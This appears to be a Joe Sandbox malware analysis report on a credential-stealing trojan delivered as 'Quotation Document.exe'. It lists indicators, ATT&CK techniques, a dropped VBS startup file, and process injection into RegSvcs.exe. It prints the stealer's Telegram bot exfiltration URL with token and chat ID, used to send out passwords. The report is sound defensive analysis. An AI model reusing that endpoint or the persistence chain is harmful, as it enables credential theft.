                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting
                Valid Accounts11
                Native API
                111
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                212
                Process Injection
                11
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                1
                File and Directory Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Registry Run Keys / Startup Folder
                2
                Registry Run Keys / Startup Folder
                3
                Obfuscated Files or Information
                Security Account Manager124
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Software Packing
                NTDS231
                Security Software Discovery
                Distributed Component Object Model1
                Input Capture
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets11
                Virtualization/Sandbox Evasion
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading
                Cached Domain Credentials2
                Process Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Virtualization/Sandbox Evasion
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection
                Proc Filesystem1
                System Network Configuration Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546477 Sample: Quotation Document.exe Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 28 reallyfreegeoip.org 2->28 30 api.telegram.org 2->30 32 2 other IPs or domains 2->32 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->44 50 13 other signatures 2->50 8 Quotation Document.exe 3 2->8         started        11 wscript.exe 1 2->11         started        signatures3 46 Tries to detect the country of the analysis system (by using the IP) 28->46 48 Uses the Telegram API (likely for C&C communication) 30->48 process4 file5 24 C:\Users\user\AppData\Local\...\neophobia.exe, PE32 8->24 dropped 14 neophobia.exe 1 8->14         started        56 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->56 18 neophobia.exe 11->18         started        signatures6 process7 file8 26 C:\Users\user\AppData\...\neophobia.vbs, data 14->26 dropped 58 Multi AV Scanner detection for dropped file 14->58 60 Machine Learning detection for dropped file 14->60 62 Drops VBS files to the startup folder 14->62 64 3 other signatures 14->64 20 RegSvcs.exe 15 2 14->20         started        signatures9 process10 dnsIp11 34 api.telegram.org 149.154.167.220, 443, 49828 TELEGRAMRU United Kingdom 20->34 36 reallyfreegeoip.org 188.114.96.3, 443, 49827 CLOUDFLARENETUS European Union 20->36 38 checkip.dyndns.com 193.122.6.168, 49826, 80 ORACLE-BMC-31898US United States 20->38 52 Tries to steal Mail credentials (via file / registry access) 20->52 54 Tries to harvest and steal browser information (history, passwords, etc) 20->54 signatures12

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Quotation Document.exe66%ReversingLabsWin32.Trojan.AutoitInject
                Quotation Document.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\emboweling\neophobia.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\emboweling\neophobia.exe66%ReversingLabsWin32.Trojan.AutoitInject
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://checkip.dyndns.org/0%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                http://reallyfreegeoip.org0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                http://checkip.dyndns.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                188.114.96.3
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      unknown
                      checkip.dyndns.org
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679778644&caption=user%20/%20Passwords%20/%20173.254.250.77false
                          unknown
                          https://reallyfreegeoip.org/xml/173.254.250.77false
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.microsoft.sRegSvcs.exe, 00000007.00000002.2906364224.0000000005412000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://api.telegram.orgRegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmptrue
                                unknown
                                https://api.telegram.org/botRegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmptrue
                                  unknown
                                  https://reallyfreegeoip.org/xml/173.254.250.77lRegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    http://checkip.dyndns.org/qRegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2903015296.0000000002D58000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.telegram.org/bot7479124552:AAELHYVLYxHEQdxzK-H17KRix-YKXifzKCI/sendDocument?chat_id=5679RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://checkip.dyndns.orgRegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://checkip.dyndns.comRegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://api.telegram.orgRegSvcs.exe, 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000007.00000002.2903015296.0000000002CB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000007.00000002.2903015296.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          149.154.167.220
                                          api.telegram.orgUnited Kingdom
                                          62041TELEGRAMRUtrue
                                          193.122.6.168
                                          checkip.dyndns.comUnited States
                                          31898ORACLE-BMC-31898USfalse
                                          188.114.96.3
                                          reallyfreegeoip.orgEuropean Union
                                          13335CLOUDFLARENETUStrue
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1546477
                                          Start date and time:2024-11-01 00:36:05 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 37s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:10
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Quotation Document.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 94%
                                          • Number of executed functions: 65
                                          • Number of non-executed functions: 42
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: Quotation Document.exe
                                          TimeTypeDescription
                                          19:38:51API Interceptor63x Sleep call for process: RegSvcs.exe modified
                                          23:38:46AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          149.154.167.220PZKAQY0bX5.exeGet hashmaliciousBlank GrabberBrowse
                                            aLRjksjY78.exeGet hashmaliciousHackBrowserBrowse
                                              Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                RFQ Proposals ADC-24-65.exeGet hashmaliciousMassLogger RATBrowse
                                                  RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exeGet hashmaliciousMassLogger RATBrowse
                                                    Payment Receipt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      Product Inquiry-002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        Quotation enquiry.exeGet hashmaliciousUnknownBrowse
                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            200716 SUMI SAUJANA Water Pump 100%.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              193.122.6.168PROFORMA FATURA pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              clipper.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              z1MRforsteamDRUM-A1_pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              INVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              • checkip.dyndns.org/
                                                              Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • checkip.dyndns.org/
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              reallyfreegeoip.orgz17Mz7zumpwTUMRxyS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              INVOICE ATTACHMENT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.97.3
                                                              RFQ Proposals ADC-24-65.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.97.3
                                                              RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.97.3
                                                              MB267382625AE.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 188.114.97.3
                                                              Payment Receipt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              Product Inquiry-002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              Quotation enquiry.exeGet hashmaliciousUnknownBrowse
                                                              • 188.114.97.3
                                                              Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              checkip.dyndns.comz17Mz7zumpwTUMRxyS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 132.226.247.73
                                                              INVOICE ATTACHMENT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 132.226.8.169
                                                              Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 132.226.8.169
                                                              RFQ Proposals ADC-24-65.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 132.226.8.169
                                                              RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 132.226.247.73
                                                              MB267382625AE.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 132.226.8.169
                                                              Payment Receipt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 158.101.44.242
                                                              Product Inquiry-002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 158.101.44.242
                                                              Quotation enquiry.exeGet hashmaliciousUnknownBrowse
                                                              • 132.226.8.169
                                                              Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 158.101.44.242
                                                              api.telegram.orgPZKAQY0bX5.exeGet hashmaliciousBlank GrabberBrowse
                                                              • 149.154.167.220
                                                              aLRjksjY78.exeGet hashmaliciousHackBrowserBrowse
                                                              • 149.154.167.220
                                                              Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 149.154.167.220
                                                              RFQ Proposals ADC-24-65.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 149.154.167.220
                                                              RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 149.154.167.220
                                                              Payment Receipt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 149.154.167.220
                                                              Product Inquiry-002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 149.154.167.220
                                                              Quotation enquiry.exeGet hashmaliciousUnknownBrowse
                                                              • 149.154.167.220
                                                              Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 149.154.167.220
                                                              200716 SUMI SAUJANA Water Pump 100%.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              • 149.154.167.220
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              ORACLE-BMC-31898USY2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 193.122.130.0
                                                              Payment Receipt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 158.101.44.242
                                                              Product Inquiry-002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 158.101.44.242
                                                              Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 158.101.44.242
                                                              200716 SUMI SAUJANA Water Pump 100%.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              • 193.122.130.0
                                                              Eprdtdrqbr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 158.101.44.242
                                                              Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              • 158.101.44.242
                                                              PROFORMA FATURA pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 193.122.6.168
                                                              clipper.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                              • 193.122.6.168
                                                              Invoices.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 193.122.130.0
                                                              TELEGRAMRUoZ7nac01Em.exeGet hashmaliciousStealc, VidarBrowse
                                                              • 149.154.167.99
                                                              PZKAQY0bX5.exeGet hashmaliciousBlank GrabberBrowse
                                                              • 149.154.167.220
                                                              aLRjksjY78.exeGet hashmaliciousHackBrowserBrowse
                                                              • 149.154.167.220
                                                              Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 149.154.167.220
                                                              RFQ Proposals ADC-24-65.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 149.154.167.220
                                                              RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 149.154.167.220
                                                              Payment Receipt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 149.154.167.220
                                                              Product Inquiry-002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 149.154.167.220
                                                              Quotation enquiry.exeGet hashmaliciousUnknownBrowse
                                                              • 149.154.167.220
                                                              Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 149.154.167.220
                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                              • 188.114.97.3
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                              • 188.114.96.3
                                                              sF9f27gI0U.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.33.140
                                                              https://www.phsinc.com/?bwfan-track-action=click&bwfan-track-id=0ecdd1bdf2276cad3fa2d27ffa918e84&bwfan-uid=e2dffed46dd69d19d18bc527d6255bd5&bwfan-link=%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%2E%72%69%67%6F%74%69%6C%65%73%2E%63%6F%6D%2F%6A%50%73%51%57%55%63%42Get hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                              • 188.114.96.3
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                              • 188.114.97.3
                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                              • 172.64.41.3
                                                              https://hotmail.pizza4you.com.br/Get hashmaliciousMamba2FABrowse
                                                              • 104.17.25.14
                                                              greenthingswithgreatnewsforgetmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                              • 188.114.96.3
                                                              ykDoK8BtxW.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                              • 188.114.97.3
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.97.3
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              54328bd36c14bd82ddaa0c04b25ed9adz17Mz7zumpwTUMRxyS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              INVOICE ATTACHMENT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              RFQ Proposals ADC-24-65.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.96.3
                                                              RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.96.3
                                                              MB267382625AE.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              Payment Receipt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              Product Inquiry-002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 188.114.96.3
                                                              Quotation enquiry.exeGet hashmaliciousUnknownBrowse
                                                              • 188.114.96.3
                                                              Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              200716 SUMI SAUJANA Water Pump 100%.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              • 188.114.96.3
                                                              3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousUnknownBrowse
                                                              • 149.154.167.220
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 149.154.167.220
                                                              greatthingswithmegoods.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                              • 149.154.167.220
                                                              seethebestthingswithgreatthingshrewithme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                              • 149.154.167.220
                                                              creatednewthingsformee.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                              • 149.154.167.220
                                                              greenthingswithgreatnewsforgetmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                              • 149.154.167.220
                                                              TJXpRilNkh.exeGet hashmaliciousXWormBrowse
                                                              • 149.154.167.220
                                                              IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                              • 149.154.167.220
                                                              1bE8S5sN9S.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                              • 149.154.167.220
                                                              http://amtso.eicar.org/PotentiallyUnwanted.exeGet hashmaliciousUnknownBrowse
                                                              • 149.154.167.220
                                                              No context
                                                              Process:C:\Users\user\Desktop\Quotation Document.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):209408
                                                              Entropy (8bit):7.822393794674
                                                              Encrypted:false
                                                              SSDEEP:6144:6zugXfOyyYcb9XOQZcgQTJ8q5GHQ4e1v2uucdc:66dTVvY8UGY1vsJ
                                                              MD5:59266D5B1290902EB22072A742F2D655
                                                              SHA1:157B79299413739032693B43F1D0DADD7ACE647C
                                                              SHA-256:A6ADF1311C4C7E25D39DB9E1439E730D0B28ADAF74D2686EBE8600678F7EB511
                                                              SHA-512:AA034B8ABE76B067F11AD285397F22B1BB717FADABE37D451CD0920B3172BD4733394F03655E2D6DA5EDD72FF2EB1ECC18CF6A29F4D15D2468B6860E3C3594FD
                                                              Malicious:false
                                                              Reputation:low
